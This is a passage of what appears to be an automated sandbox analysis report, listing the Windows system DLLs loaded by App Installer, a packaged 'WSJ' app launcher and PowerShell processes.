                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.ui.xaml.controls.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: execmodelproxy.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: rmclient.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: uiamanager.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.ui.core.textinput.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.ui.immersive.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dataexchange.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: winrttracing.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.applicationmodel.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.globalization.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: twinapi.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: directmanipulation.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: daxexec.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: fltlib.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: container.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: appxdeploymentclient.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: profext.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: appcontracts.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: cdprt.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: cdp.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: umpdc.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dsreg.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: appxpackaging.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: msxml6.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: cryptxml.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: webservices.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: cryptowinrt.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: cryptnet.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: certenroll.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: certca.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dsparse.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: threadpoolwinrt.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: ninput.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.networking.connectivity.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: installservice.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: msvcp140.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: vcruntime140_1.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: vcruntime140.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: twinapi.appcore.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: rometadata.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: windows.storage.applicationdata.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: appcontracts.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: windows.applicationmodel.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: cdprt.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: cdp.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: umpdc.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: dsreg.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: appxdeploymentclient.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: capauthz.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: windows.staterepositorycore.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: ondemandbrokerclient.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: psfruntime64.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: daxexec.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: fltlib.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: container.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: appxdeploymentclient.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: capauthz.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: windows.staterepositorycore.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: capauthz.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositorycore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: capauthz.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositorycore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ieframe.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netapi32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mlang.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: daxexec.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fltlib.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: container.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxdeploymentclient.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
